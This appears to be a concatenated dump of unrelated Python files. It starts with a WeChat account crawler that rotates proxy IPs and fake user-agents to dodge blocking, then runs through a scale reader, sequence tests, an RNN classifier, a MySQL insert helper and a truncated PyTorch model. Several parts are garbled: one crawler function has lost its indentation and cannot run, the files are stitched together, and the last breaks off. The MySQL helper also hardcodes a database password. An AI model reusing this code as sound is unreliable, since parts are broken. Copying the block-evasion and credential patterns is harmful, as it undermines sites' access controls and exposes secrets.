# Description: get new user_account info from weixin.sogou.com
# Version: 1.0
# History: 2014-07-04 Created by Hou
import os
import time
from threading import Thread
from bs4 import *
from config import *
from connect_with_proxy_ip_and_fake_ua import get_connect_by_proxyip_ua
from help_func_for_user_account_crawl import *
################### Main function for get new account ####################
def write_keywords_to_redis_set(keywords):
    """Add each keyword to the shared 'keywords_set' in redis.

    NOTE(review): relies on a module-level redis client `r` provided by one of
    the star-imported helper modules -- confirm which one defines it.
    """
    for keyword in keywords:
        r.sadd('keywords_set', keyword)
def get_new_account_info_by_single_nav_page(page_num, keyword):
    """Scrape one search-result ("nav") page for `keyword`.

    Returns a tuple of 2 items:
    the first is the list of account-info dicts found on the page,
    the second is a bool indicating whether this is the last nav page.
    Returns None when the connection or parsing fails.
    """
    single_nav_info_list = []
    # get the url by keywords
    tmp_nav_url = get_nav_page_url_by_keywords(keyword)
    nav_url = tmp_nav_url[0] + str(page_num) + tmp_nav_url[1]
    print "nav_url -> ", nav_url
    # connect to the website through a rotating proxy / fake user-agent
    c = get_connect_by_proxyip_ua(nav_url)
    if (c is None):
        return None
    # build soup
    soup_obj = BeautifulSoup(c.read())
    if (soup_obj is None):
        return None
    is_last_page = is_last_page_by_soup(soup_obj)
    # print soup_obj.prettify()
    # parse the soup, and get the info tag for each account result
    all_divs = soup_obj.find_all("div", class_="wx-rb bg-blue wx-rb_v1 _item")
    if (all_divs is None):
        return None
    for info_div in all_divs:
        # extract all the info from a single result tag
        weibo_info = get_info_by_tag(info_div, keyword)
        if weibo_info is not None:
            single_nav_info_list.append(weibo_info)
    return (single_nav_info_list, is_last_page)
def get_new_account_info_by_nav_pages(keyword, max_page_number=20):
    """Search `keyword` across all nav pages on weixin.sogou.com.

    Returns a list of dicts with all account info found for the keyword.
    So far the site serves at most 20 nav pages per keyword.
    """
    new_account_info_list = []
    for page_num in xrange(1, max_page_number + 1):
        log(str(keyword) + " : crawl page %d ..." % page_num)
        # get and store the account info from a single nav page
        single_nav_info_list = get_new_account_info_by_single_nav_page(
            page_num, keyword)
        if (single_nav_info_list is None):
            log("The search is failed, check the url or the proxy_ips. \n")
            break
        account_info_list = single_nav_info_list[0]
        if account_info_list is not None:
            new_account_info_list.extend(account_info_list)
        # if it is the last page, then break
        is_last_page = single_nav_info_list[-1]
        if (is_last_page is True):
            log("The max nav page for " + '\"' +
                str(keyword) + '\"' + " is %d " % page_num)
            break
        # throttle between page fetches to avoid being blocked
        sleep_for_a_while()
    return new_account_info_list
def get_header_list_for_new_account():
    """Return the TSV column names for a newly discovered WeChat account."""
    return [
        "weibo_name", "weibo_id", "home_page_url", "QR_code_url",
        "sogou_openid", "tou_xiang_url", "function_description",
        "is_verified", "verified_info", "keywords",
    ]
def output_new_account_to_local_file(new_account_info_list):
"""
Output new account info to local file
"""
# get header, new account has no account_id and is_existed
header_list = get_header_list_for_new_account()
header_str = '\t'.join(header_list) + '\n'
# create new path and file to store the info
time_str = time.strftime('%Y%m%d')
path_dir = "./account/" + time_str
file_path = path_dir + "/" + "new_weixin_account.tsv"
try:
# determine wheter the path is existed or not
is_dir_existed = os.path.exists(path_dir)
if (not is_dir_existed):
# create the directory, and write header_str to the file
log("the path is not existed, create a new one")
os.makedirs(path_dir)
file_obj = open(file_path, 'w')
file_obj.write(header_str)
else:
log("the path is existed")
# open the file as append mode --> no header_str
file_obj = open(file_path, 'a')
# write all the new account info to file
for single_info in new_account_info_list:
single_info_list = []
# get single account info based on header_list
for field in header_list:
single_info_list.append(single_info.get(field, 'NA'))
single_info_str = '\t'.join(
[str(i) for i in single_info_list]) + '\n'
file_obj.write(single_info_str)
except BaseException as output_error:
print "error: output_new_account_to_local_file " + output_error.message
finally:
file_obj.close()
def get_new_account_info_by_keywords_from_redis():
    """Drain the redis 'keywords_set', crawling each popped keyword.

    Successful results are appended to the local TSV file; keywords whose
    search failed (or returned nothing) are recorded in 'keyword_fail_set'.
    Safe to run from several threads: spop hands each keyword to one worker.
    """
    # NOTE(review): this counts 'account_id_set' but the loop drains
    # 'keywords_set' — confirm the log's "total number" uses the right set.
    total_num_keywords = r.scard('account_id_set')
    keyword = r.spop('keywords_set')
    while keyword is not None:
        log("The total number of keywords is " +
            str(total_num_keywords) +
            " , and remain number of keywords is " +
            str(r.scard('keywords_set')) +
            " , current keyword is " + str(keyword))
        new_account_info_list = get_new_account_info_by_nav_pages(keyword)
        if new_account_info_list is None or new_account_info_list == []:
            log('search failed, add the keyword to failed set in redis ' +
                'the keyword is ' + str(keyword))
            r.sadd("keyword_fail_set", keyword)
            keyword = r.spop('keywords_set')
            continue
        else:
            output_new_account_to_local_file(new_account_info_list)
        # next iteration
        keyword = r.spop('keywords_set')
def get_new_account_info_by_keywords(keywords):
    """ Get new weixin account from weixin.sogou.com by keywords
    Return a list of list of dict, which contains all the weixin_info
    """
    # NOTE(review): despite the docstring, this returns None — results are
    # written to local files by the redis-driven worker below.
    write_keywords_to_redis_set(keywords)  # keywords_set
    get_new_account_info_by_keywords_from_redis()
def get_new_account_with_multi_thread(keywords):
    """Crawl account info for *keywords* using THREAD_NUM daemon workers.

    Seeds the redis keyword set, then lets each worker drain it
    concurrently and blocks until all workers finish.
    """
    write_keywords_to_redis_set(keywords)
    workers = [Thread(target=get_new_account_info_by_keywords_from_redis)
               for _ in xrange(THREAD_NUM)]
    # mark each worker as a daemon and start it
    for worker in workers:
        worker.setDaemon(True)
        worker.start()
    # Wait until every worker terminates
    for worker in workers:
        worker.join()
def main():
    # example search terms; replace with real keywords as needed
    keywords = ['it', 'df', 'houxianxu', 'movie']
    # get_new_account_info_by_keywords(['IT', 'df', 'houxianxu'])
    get_new_account_with_multi_thread(keywords)


if __name__ == '__main__':
    main()
|
23,590 | d4dfa0712d8ea26ee86cb5ad77bc3920e466074a | import numpy as np
import torch
import scipy.sparse as sp
def load_raw_data(self, path="data/email/", dataset="email", graph_size=0.8, graph_number=5):
assert path == "data/email/", "path error"
assert dataset in ["email", "email_depart1", "email_depart2", "email_depart3",
"email_depart4"], "no such dataset {}".format(dataset)
data = np.genfromtxt(path + dataset + ".txt", delimiter=' ', dtype=np.long)
source = data[:, 0]
target = data[:, 1]
time = data[:, 2]
id_set = set(np.sort(np.concatenate((source, target), axis=0)))
id_dict = {j: i for i, j in enumerate(id_set)}
source_idx = np.array([id_dict[i] for i in source])
target_idx = np.array([id_dict[i] for i in target])
node_number = len(id_dict)
timespan = time[-1] - time[0]
tmp = time[0] + int(timespan * graph_size)
stride = int((time[-1] - tmp) / graph_number)
start_time_list = [time[0] + i * stride for i in range(graph_number)]
end_time_list = [tmp + i * stride for i in range(graph_number)]
# generate E_sh
E_sh = {}
for i in range(graph_number):
start_time = start_time_list[i]
end_time = end_time_list[i]
idx = np.argwhere((time >= start_time) & (time <= end_time)).squeeze()
src_nodes = source_idx[idx]
tgt_nodes = target_idx[idx]
tgt_neg_nodes = np.random.randint(0,node_number, size=tgt_nodes.shape)
E_sh[i] = zip(src_nodes, tgt_nodes, tgt_neg_nodes)
# generate E_tr
E_tr = {}
for i in range(graph_number-1):
|
23,591 | 2507ecfcedb9b0d63c540d5229c2f582bde88826 | import board
import pulseio
import digitalio
import time
led = digitalio.DigitalInOut(board.D13)
led.direction = digitalio.Direction.OUTPUT
class ScaleReading:
    """One parsed measurement from a DYMO scale data packet."""

    # Unit codes as reported in byte 3 of the packet. Plain ints instead of
    # const(): const comes from micropython and was never imported here, so
    # evaluating this class body raised NameError. const() returns its
    # argument unchanged, so the values are identical.
    OUNCES = 0x0B  # data in weight is in ounces
    GRAMS = 0x02   # data in weight is in grams

    units = None   # what units we're measuring
    stable = None  # is the measurement stable?
    weight = None  # the weight!
def get_scale_data(pin, timeout=1.0):
    """Read a pulse of SPI data on a pin that corresponds to DYMO scale
    output protocol (12 bytes of data at about 14KHz), timeout is in seconds"""
    timestamp = time.monotonic()
    with pulseio.PulseIn(pin, maxlen=96, idle_state=True) as pulses:
        pulses.pause()
        pulses.clear()
        pulses.resume()
        # wait until a burst of pulses arrives, or give up after `timeout`
        while len(pulses) < 35:
            if (time.monotonic() - timestamp) > timeout:
                raise RuntimeError("Timed out waiting for data")
        pulses.pause()
        bits = [0] * 96  # there are 12 bytes = 96 bits of data
        bit_idx = 0  # we will count a bit at a time
        bit_val = False  # first pulses will be LOW
        print(pulses[1])  # NOTE(review): debug leftover — safe to remove
        # each captured pulse width says how many clock periods the line held
        # one level; expand widths back into individual bits
        for i in range(len(pulses)):
            if pulses[i] == 65535:  # This is the pulse between transmits
                break
            num_bits = int(pulses[i] / 75 + 0.5)  # ~14KHz == ~7.5us per clock
            # print("%d (%d)," % (pulses[i], num_bits), end='')
            for bit in range(num_bits):
                # print("bit #", bit_idx)
                bits[bit_idx] = bit_val
                bit_idx += 1
                if bit_idx == 96:  # we have read all the data we wanted
                    # print("DONE")
                    break
            bit_val = not bit_val
        # print(bits)
        # pack the 96 bits MSB-first into 12 bytes
        data_bytes = [0] * 12
        for byte_n in range(12):
            thebyte = 0
            for bit_n in range(8):
                thebyte <<= 1
                thebyte |= bits[byte_n*8 + bit_n]
            data_bytes[byte_n] = thebyte
        print([hex(i) for i in data_bytes])
        # do some very basic data checking
        if data_bytes[0] != 3 or data_bytes[1] != 3 or data_bytes[7] != 4 \
           or data_bytes[8] != 0x1C or data_bytes[9] != 0 or data_bytes[10] \
           or data_bytes[11] != 0:
            raise RuntimeError("Bad data capture")
        # decode the packet into a ScaleReading
        reading = ScaleReading()
        reading.stable = data_bytes[2] & 0x4
        reading.units = data_bytes[3]
        reading.weight = data_bytes[5] + (data_bytes[6] << 8)
        if data_bytes[2] & 0x1:
            # sign flag: reading is negative (e.g. tared below zero)
            reading.weight *= -1
        if reading.units == ScaleReading.OUNCES:
            # oi no easy way to cast to int8_t
            if data_bytes[4] & 0x80:
                data_bytes[4] -= 0x100
            reading.weight *= 10 ** data_bytes[4]
        return reading
# Poll the scale forever, printing each successful reading with its unit.
while True:
    try:
        reading = get_scale_data(board.MISO)
        if reading.units == ScaleReading.OUNCES:
            print(reading.weight, "oz")
        if reading.units == ScaleReading.GRAMS:
            print(reading.weight, "g")
    except RuntimeError:
        # timeout or corrupt capture — keep polling
        print("Failed to read data, is scale on?")
|
23,592 | c8610467c68d6e899c6d10cb7871ba0e11cf8c1f |
import csb.bio.sequence as sequence
import csb.bio.io.fasta
import csb.test as test
@test.unit
class TestSequence(test.Case):
    """Unit tests for csb.bio.sequence.Sequence over the fixture 'AB-CD'."""

    def setUp(self):
        super(TestSequence, self).setUp()
        # FASTA text the fixture must serialize back to
        self.data = '>id desc\nAB-CD'
        self.sequence = sequence.Sequence('id', '>id desc', 'AB-CD', sequence.SequenceTypes.Protein)
        assert str(self.sequence) == self.data

    def testLength(self):
        self.assertEqual(self.sequence.length, 5)
        self.assertEqual(self.sequence.length, len(self.sequence))

    def testId(self):
        self.assertEqual(self.sequence.id, 'id')

    def testHeader(self):
        # header excludes the leading '>'
        self.assertEqual(self.sequence.header, 'id desc')

    def testSequence(self):
        self.assertEqual(self.sequence.sequence, 'AB-CD')

    def testType(self):
        # assigning a residue constant (not a sequence type) must raise
        def test(v):
            self.sequence.type = v
        self.assertRaises(TypeError, test, sequence.ProteinAlphabet.ALA)
        self.assertEqual(self.sequence.type, sequence.SequenceTypes.Protein)

    def testAlphabet(self):
        self.assertEqual(self.sequence.alphabet, sequence.ProteinAlphabet)

    def testStrip(self):
        # strip() removes gap characters
        self.assertEqual(self.sequence.strip().sequence, 'ABCD')

    def testSubregion(self):
        s = self.sequence
        self.assertEqual(s.subregion(2, 3).sequence, 'B-')
        # ranks are 1-based and bounded by the sequence length
        self.assertRaises(sequence.SequencePositionError, s.subregion, -1, 2)
        self.assertRaises(sequence.SequencePositionError, s.subregion, 1, 6)

    def testExtract(self):
        s = self.sequence
        self.assertEqual(s.extract((2, 3, 5)).sequence, 'B-D')
        self.assertRaises(sequence.SequencePositionError, s.extract, [-1])
        self.assertRaises(sequence.SequencePositionError, s.extract, [6])

    def testIndexeres(self):
        # NOTE(review): method name is misspelled ("Indexeres") but is still
        # discovered by the runner; kept as-is for stability.
        # residues[] is 1-based (rank), plain [] slicing is 0-based.
        s = self.sequence
        self.assertEqual(s.residues[2].type, sequence.ProteinAlphabet.ASX)
        self.assertEqual(s.residues[1].type, s[0].type)
        self.assertEqual(s[:].sequence, s.sequence)
        self.assertEqual(s[2:].sequence, '-CD')
        self.assertEqual(s[2:3].sequence, '-')
        for rank in [-1, 0, 6]:
            self.assertRaises(sequence.SequencePositionError, lambda i: s.residues[i], rank)
        for index in [-1, 5]:
            self.assertRaises(IndexError, lambda i: s[i], index)
        self.assertRaises(IndexError, lambda: s[-1:])

    def testIterator(self):
        chars = [ str(r.type) for r in self.sequence ]
        seq = ''.join(chars)
        self.assertEqual(self.sequence.sequence.upper(), seq)

    def testToString(self):
        self.assertEqual(str(self.sequence), self.data)
        self.assertEqual(str(self.sequence), self.data)

    def testDump(self):
        # dump() must accept both a file name and an open stream
        with self.config.getTempStream() as tmp:
            self.sequence.dump(tmp.name)
            tmp.flush()
            self.assertEqual(open(tmp.name).read().strip(), self.data)
        with self.config.getTempStream() as tmp:
            self.sequence.dump(tmp)
            tmp.flush()
            self.assertEqual(open(tmp.name).read().strip(), self.data)
@test.unit
class TestRichSequence(TestSequence):
    """Re-runs the full TestSequence suite against a RichSequence copy."""

    def setUp(self):
        super(TestRichSequence, self).setUp()
        self.sequence = sequence.RichSequence.create(self.sequence)
@test.unit
class TestChainSequence(TestSequence):
    """Re-runs the TestSequence suite against a ChainSequence built from a Chain."""

    def setUp(self):
        super(TestChainSequence, self).setUp()
        from csb.bio.structure import ProteinResidue, Chain
        chain = Chain('A', name='desc', accession='accn')
        for rank, char in enumerate('AB-CD', start=1):
            chain.residues.append(ProteinResidue(rank, char))
        self.sequence = sequence.ChainSequence.create(chain)
        # normalize id/header so the inherited assertions still apply
        self.sequence.header = '>id desc'
        self.sequence.id = 'id'
@test.unit
class TestSequenceCollection(test.Case):
    """Tests for SequenceCollection FASTA serialization."""

    def setUp(self):
        super(TestSequenceCollection, self).setUp()
        s1 = sequence.Sequence('id1', '>id1 desc', 'AB-CD', sequence.SequenceTypes.Protein)
        s2 = sequence.Sequence('id2', '>id2 desc', 'ABCDE', sequence.SequenceTypes.Protein)
        self.collection = sequence.SequenceCollection([s1, s2])
        self.data = '>id1 desc\nAB-CD\n>id2 desc\nABCDE'

    def testToFASTA(self):
        # to_fasta() must accept both a file name and an open stream
        with self.config.getTempStream() as tmp:
            self.collection.to_fasta(tmp.name)
            tmp.flush()
            self.assertEqual(open(tmp.name).read().strip(), self.data)
        with self.config.getTempStream() as tmp:
            self.collection.to_fasta(tmp)
            tmp.flush()
            self.assertEqual(open(tmp.name).read().strip(), self.data)
@test.unit
class TestSequenceAlignment(test.Case):
    """Tests for SequenceAlignment over two 5-column protein rows."""

    def _factory(self, sequences, strict=True):
        # overridden by subclasses to exercise other alignment flavors
        return sequence.SequenceAlignment(sequences, strict=strict)

    def setUp(self):
        super(TestSequenceAlignment, self).setUp()
        seq1 = sequence.Sequence('s1', 's1 desc1', 'AB-CD', sequence.SequenceTypes.Protein)
        seq2 = sequence.RichSequence('s2', 's2 desc2', list('ABX-D'), sequence.SequenceTypes.Protein)
        self.ali = self._factory([seq1, seq2])
        # non-strict alignment, allowing duplicate row ids
        self.ali2 = self._factory([seq1, seq2, seq2, seq2], strict=False)

    def testAdd(self):
        # strict
        self.assertRaises(sequence.SequenceError, self.ali.add, sequence.Sequence('sn', 'sn','TOO-LONG-SEQ'))
        self.assertRaises(sequence.DuplicateSequenceError, self.ali.add, sequence.Sequence('s1', 's1','AB-CD'))

    def testLength(self):
        self.assertEqual(self.ali.length, 5)

    def testSize(self):
        self.assertEqual(self.ali.size, 2)
        self.assertEqual(self.ali2.size, 4)

    def testSubregion(self):
        sub = self.ali.subregion(2, 4)
        self.assertEqual(sub.length, 3)
        self.assertEqual(sub.size, 2)
        self.assertEqual(sub.rows[1].sequence, 'B-C')
        self.assertEqual(sub.rows[2].sequence, 'BX-')
        # columns are 1-based and bounded by the alignment length
        self.assertRaises(sequence.ColumnPositionError, self.ali.subregion, -1, 2)
        self.assertRaises(sequence.ColumnPositionError, self.ali.subregion, 1, 6)
        # should not raise DuplicateSequenceError
        self.ali2.subregion(1, 2)

    def testFormat(self):
        self.assertEqual(self.ali.format(headers=False).strip(), 'AB-CD\nABX-D')
        self.assertEqual(self.ali.format(headers=True).strip(), '>s1 desc1\nAB-CD\n>s2 desc2\nABX-D')

    def testRows(self):
        a = self.ali
        self.assertEqual(a.rows[2].id, 's2')
        self.assertRaises(sequence.SequenceNotFoundError, lambda i: a.rows[i], -1)
        self.assertRaises(sequence.SequenceNotFoundError, lambda i: a.rows[i], 3)
        # with duplicates: repeated ids stay addressable via ':A<n>' suffixes
        self.assertEqual(self.ali2.rows['s2'].id, 's2')
        self.assertEqual(self.ali2.rows['s2:A1'].id, 's2')
        self.assertEqual(self.ali2.rows['s2:A2'].id, 's2')

    def testColumns(self):
        a = self.ali
        self.assertEqual(a.columns[4][0].id, 's1')
        self.assertEqual(a.columns[4][0].column, 4)
        self.assertEqual(a.columns[4][0].residue.type, sequence.ProteinAlphabet.CYS)
        self.assertEqual(len(a.columns[4]), a.size)
        self.assertEqual(len(a.columns[4]), len(a.columns[3]))

    def testRowColumns(self):
        # per-row column access must agree with whole-alignment column access
        a = self.ali
        self.assertEqual(a.rows[1].columns[4].id, a.columns[4][0].id)
        self.assertEqual(a.rows[1].columns[4].column, a.columns[4][0].column)
        self.assertEqual(a.rows[1].columns[4].residue.type, a.columns[4][0].residue.type)

    def testRowResidues(self):
        a = self.ali
        self.assertEqual(a.rows[1].residues[4].type, sequence.ProteinAlphabet.ASP)
        self.assertEqual(a.rows[1].residues[3].type, sequence.ProteinAlphabet.CYS)
        self.assertEqual(a.rows[2].residues[4].type, sequence.ProteinAlphabet.ASP)
        self.assertEqual(a.rows[2].residues[3].type, sequence.ProteinAlphabet.UNK)

    def testRowMap(self):
        # map between alignment columns and ungapped residue ranks
        a = self.ali
        self.assertEqual(a.rows[1].map_column(4), 3)
        self.assertEqual(a.rows[1].map_residue(3), 4)

    def testIndexer(self):
        # a[rows, columns] indexing with ints, slices and tuples (0-based)
        a = self.ali
        self.assertEqual(a[0, 0].rows['s1'].id, 's1')
        self.assertEqual(a[1, 4].rows['s2'].columns[1].residue.type, sequence.ProteinAlphabet.ASP)
        self.assertEqual(a[0, 0].size, 1)
        self.assertEqual(a[0, 0].length, 1)
        self.assertEqual(a[:, 0].size, 2)
        self.assertEqual(a[:, 0].length, 1)
        self.assertEqual(a[0, :].size, 1)
        self.assertEqual(a[0, :].length, 5)
        self.assertEqual(a[0:2, 0:2].size, 2)
        self.assertEqual(a[0:2, 0:2].length, 2)
        self.assertEqual(a[(0, 1), (0, 1, 3)].size, 2)
        self.assertEqual(a[(0, 1), (0, 1, 3)].length, 3)
        self.assertRaises(IndexError, lambda: a[-1, :])
        self.assertRaises(IndexError, lambda: a[:, -1])
        self.assertRaises(TypeError, lambda: a['', :])
        self.assertRaises(TypeError, lambda: a[:, ''])
        self.assertRaises(ValueError, lambda: a[[], :])
        self.assertRaises(ValueError, lambda: a[:, []])
        self.assertRaises(IndexError, lambda: a[-1:, :])
        self.assertRaises(IndexError, lambda: a[:, -1:])

    def testGapAt(self):
        self.assertFalse(self.ali.gap_at(1))
        self.assertTrue(self.ali.gap_at(3))
@test.unit
class TestA3MAlignmentSimple(TestSequenceAlignment):
    """Re-runs the full alignment suite against A3MAlignment."""

    def _factory(self, sequences, strict=True):
        return sequence.A3MAlignment(sequences, strict=strict)
@test.unit
class TestA3MAlignment(test.Case):
    """Tests for parsing a real A3M file (the d1nz0a_.a3m fixture)."""

    def setUp(self):
        super(TestA3MAlignment, self).setUp()
        self.file = self.config.getTestFile('d1nz0a_.a3m')
        self.a3m = open(self.file).read()
        self.ali = sequence.A3MAlignment.parse(self.a3m)

    def testMatches(self):
        self.assertEqual(self.ali.matches, 109)

    def testLength(self):
        self.assertEqual(self.ali.length, 135)

    def testSize(self):
        self.assertEqual(self.ali.size, 9)

    def testRows(self):
        # row 1 (master)
        row = self.ali.rows[1]
        self.assertEqual(row.id, 'd1nz0a_')
        self.assertEqual(row.length, 135)
        self.assertEqual(row.strip().length, 109)
        self.assertEqual(row.strip().sequence, 'ERLRLRRDFLLIFKEGKSLQNEYFVVLFRKNGMDYSRLGIVVKRKFGKATRRNKLKRWVREIFRRNKGVIPKGFDIVVIPRKKLSEEFERVDFWTVREKLLNLLKRIEG')

    def testToString(self):
        # round-trip: parsed alignment formats back to the original text
        self.assertEqual(self.a3m.strip(), self.ali.format().strip())

    def testFormat(self):
        fasta = self.ali.format(sequence.AlignmentFormats.FASTA, headers=False).splitlines()
        self.assertEqual(len(fasta), 9)
        for line in fasta:
            self.assertEqual(len(line), 135)
        ref = open(self.config.getTestFile('d1nz0a_.mfasta')).read()
        self.assertEqual(ref.strip(), self.ali.format(sequence.AlignmentFormats.FASTA, headers=True).strip())

    def testHMMSubregion(self):
        # hmm_subregion() addresses match columns, not raw alignment columns
        sub = self.ali.hmm_subregion(2, 30)
        self.assertEqual(sub.rows['d1nz0a_'].strip().sequence, 'RLRLRRDFLLIFKEGKSLQNEYFVVLFRK')
        self.assertEqual(sub.size, self.ali.size)
        self.assertEqual(sub.matches, 30 - 2 + 1)
        fasta = self.ali.hmm_subregion(1, 109).format(sequence.AlignmentFormats.FASTA, headers=True)
        ref = open(self.config.getTestFile('d1nz0a_.mfasta')).read()
        self.assertEqual(ref, fasta.strip())
        self.assertRaises(sequence.ColumnPositionError, self.ali.subregion, -1, 2)
        self.assertRaises(sequence.ColumnPositionError, self.ali.hmm_subregion, -1, 2)
        self.assertRaises(sequence.ColumnPositionError, self.ali.subregion, 1, 111110)
        self.assertRaises(sequence.ColumnPositionError, self.ali.hmm_subregion, 1, 110)

    def testInsertionAt(self):
        self.assertFalse(self.ali.insertion_at(1))
        self.assertTrue(self.ali.insertion_at(17))
if __name__ == '__main__':
    # run the csb test console when executed directly
    test.Console()
|
class CallDetail:
    """A single call record: caller, callee, duration and call type."""

    def __init__(self, call_from, call_to, duration, call_type):
        self.call_from = call_from
        self.call_to = call_to
        self.duration = duration
        self.call_type = call_type

    def print_details(self):
        """Print the record's fields separated by double spaces."""
        print(self.call_from, " ", self.call_to, " ",
              self.duration, " ", self.call_type)
class Util:
    """Parses comma-separated call strings into CallDetail objects."""

    def __init__(self):
        self.list_of_call_objects = []

    def parse_customer(self, list_of_call_string):
        """Convert each 'from,to,duration,type' string into a CallDetail."""
        for record in list_of_call_string:
            fields = record.split(',')
            detail = CallDetail(fields[0], fields[1], fields[2], fields[3])
            self.list_of_call_objects.append(detail)

    def show_list(self):
        """Print every stored call record."""
        for detail in self.list_of_call_objects:
            detail.print_details()
# Demo: sample records in 'caller,callee,duration,call_type' form,
# parsed and printed via Util.
call1='9999999999,8888888888,98,STD'
call2='7777777777,6666666666,67,ISD'
call3='1011010101,8855875748,2,Local'
list_of_call_string=[call1,call2,call3]
Obj1=Util()
Obj1.parse_customer(list_of_call_string)
Obj1.show_list()
23,594 | 7e5e0d58549226abbe4c438fbb2d098792389b12 | #
# @lc app=leetcode.cn id=999 lang=python3
#
# [999] 可以被一步捕获的棋子数
#
# @lc code=start
class Solution:
    def numRookCaptures(self, board: List[List[str]]) -> int:
        """Count pawns ('p') the white rook ('R') can capture in one move.

        Scans the 8x8 board for the rook, then walks each of the four
        cardinal directions from it until hitting a pawn (count it and
        stop), a friendly bishop 'B' (blocked), or the board edge.
        """
        # locate the rook (the puzzle guarantees exactly one)
        rook_row = rook_col = 0
        for row in range(8):
            for col in range(8):
                if board[row][col] == 'R':
                    rook_row, rook_col = row, col
        captured = 0
        for d_row, d_col in ((-1, 0), (1, 0), (0, -1), (0, 1)):
            row, col = rook_row, rook_col
            # walk until blocked by a bishop or falling off the board
            while 0 <= row < 8 and 0 <= col < 8 and board[row][col] != 'B':
                if board[row][col] == 'p':
                    captured += 1
                    break
                row += d_row
                col += d_col
        return captured
# @lc code=end
|
23,595 | ffd65dbebe9082f3bcb0d9e08180f63ceb3fe681 | # Useful literature:
# The simple RNN chapter of the Time Series Forecasting book
# dimensionality: https://stackoverflow.com/questions/47272351/understanding-simplernn-process
# class weights: https://datascience.stackexchange.com/questions/13490/how-to-set-class-weights-for-imbalanced-classes-in-keras
import pickle
from getROCFn import getROC
import numpy as np
from sklearn.model_selection import train_test_split
############## Functions
def load_obj(name):
    """Deserialize and return the pickled object stored at obj/<name>.pkl."""
    path = 'obj/%s.pkl' % name
    with open(path, 'rb') as handle:
        return pickle.load(handle)
###################
# get the voltage templates for class 0 and class 1
# Load the voltage data
print 'Loading the voltage data from the object file...'
VoltageDataDict = load_obj('VoltageData') # this voltage data dictionary has been generated from the script 'TS3phSimN_2FaultDataSave.py', see it for key format
# crop the data till after fault clearance
print 'Formatting the data to be used by the LR model....'
tme = VoltageDataDict['time']
timestep = tme[1] - tme[0]
#ind_fault_clearance = int(1.31/timestep) # the fault is cleared at this time
ind_fault_clearance = int(0.31/timestep) + 1 # the fault is cleared at this time
ind_fc_1s = int(1.31/timestep) + 1 # one sec after the fault is cleared
ind_line1_outage = int(0.1/timestep) + 5 # time when line 1 is outaged (added 5 time steps to make sure the voltage settles to the new value)
# use any one sample to size the feature array (all series share a length)
samplevCropped = VoltageDataDict[VoltageDataDict.keys()[0]][ind_fault_clearance:]
# get the input features and the classifications
# make an array of zeros where each row is a sample (cropped) voltage
# in each row, contains all the voltage info after the fault clearance
croppedVArray = np.zeros((len(VoltageDataDict)-1,samplevCropped.shape[0]))
dvdtTarget = np.zeros(len(VoltageDataDict)-1) # the target vector for dvdt classification
k= 0 # row number of croppedVArray
# NOTE(review): rows are filled in dict iteration order, which is
# arbitrary in Python 2 — fine as long as features/targets stay paired.
for key in VoltageDataDict:
    if key == 'time':
        continue
    voltage = VoltageDataDict[key]
    dv_dt = getROC(voltage,tme)
    croppedV = voltage[ind_fault_clearance:]
    croppedVArray[k] = croppedV
    steadyV = voltage[-100:] # the final 100 samples of the voltage
    dv_dtSteady = dv_dt[-100:]
    # classify instability according to the rate of change of voltage
    highdvdtList = [steadyV[j] for j in range(steadyV.shape[0]) if dv_dtSteady[j] > 0.05] # based only on dv_dt thresholds
    if len(highdvdtList) > 10:
        dvdtTarget[k] = 1.0
    k+=1
# construct a simple RNN model
from keras.models import Sequential
from keras.layers.recurrent import SimpleRNN
from keras.layers.core import Dense, Activation
# define inputs: first 60 post-clearance samples, reshaped to
# (samples, timesteps, features) as SimpleRNN expects
print 'Partitioning test/train data'
x = croppedVArray[:,:60]
x = np.array(x).reshape((x.shape[0],x.shape[1],1))
y = dvdtTarget
y = np.array(y).reshape((len(y),1))
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.25)
# constructing the model
print 'Constructing model and evaluating...'
batch_size = 100 # if you want to train in batches
model = Sequential()
# output dim refers to the number of delay nodes
model.add(SimpleRNN(units=60,activation="tanh",input_shape=(60,1))) # units: output dim of the SRNN, does not have to be equal to number of features
#model.add(SimpleRNN(60, activation='relu', batch_input_shape=(batch_size, x.shape[1], 1))) # using batches
model.add(Dense(units=1,activation='linear'))
model.compile(loss = 'mean_squared_error',optimizer='sgd')
#model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
#model.fit(x_train, y_train, epochs=10,class_weight = {0:3,1:100}, batch_size = batch_size)
#model.fit(x_train, y_train, epochs=10,class_weight = {0:3,1:100})
model.fit(x_train, y_train, epochs=10)
score_train = model.evaluate(x_train,y_train)
print score_train
# Things to do:
# Get the average accuracy, confusion matrix
# Find out if class weights have any effects
# Try different optimization algorithms
# Test LSTM neural networks
# This link looks interesting: https://machinelearningmastery.com/indoor-movement-time-series-classification-with-machine-learning-algorithms/
23,596 | 67091e24c006c21359be08ab9aa60301c0c9e66b | import pymysql
def get_list():
    """Read the textbook file, echo it to stdout, and return its contents.

    Returns the full file text as a str. Previously the function fell off
    the end and returned None, so callers (e.g. the __main__ block, which
    prints type(get_list())) never received the data its name promises.
    """
    with open("语文湘教版二上(标准版).txt", mode="r", encoding="utf-8") as f:
        data = f.read()
    print(data)
    return data
def insert_many(list):
    """Insert one resource row into the 'kuaik' MySQL database.

    *list* supplies the values for (id, subject, publish, version, grade,
    material), bound via parameterized placeholders. Rolls back on insert
    failure; always closes the connection.
    """
    # 打开数据库连接 (open the database connection)
    db = pymysql.connect(host="192.168.0.168", port=3306, user="root",
                         passwd='001233', db="kuaik", charset="utf8")
    try:
        # 使用cursor()方法获取游标对象 (get a cursor object)
        cursor = db.cursor()
        # placeholders must be lowercase %s — the original uppercase %S is
        # not a valid pymysql placeholder, so every execute raised and the
        # bare except silently rolled back each insert
        sql = ("INSERT INTO resource (`id`, `subject`, `publish`, `version`, "
               "`grade`, `material`) VALUES (%s,%s,%s,%s,%s,%s)")
        cursor.execute(sql, list)
        # 提交到数据库执行 (commit the transaction)
        db.commit()
    except Exception:
        # 如果发生错误 — roll back; Exception (not a bare except) so that
        # SystemExit/KeyboardInterrupt still propagate
        db.rollback()
    finally:
        # 关闭连接 — always release the connection, even on early failure
        db.close()
if __name__ == '__main__':
    # prints the type of get_list()'s return value (demo/debug entry point)
    print(type(get_list()))
23,597 | 8e751c38e904efd31221748838877179e41e4c20 | import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
    """Small all-convolutional MNIST-style classifier (1x28x28 -> 10 classes).

    The per-layer comments give the spatial output size and receptive
    field (RF) assuming a 28x28 input, as in the original layout.
    """

    @staticmethod
    def _conv(in_channels, out_channels, kernel_size, relu=True):
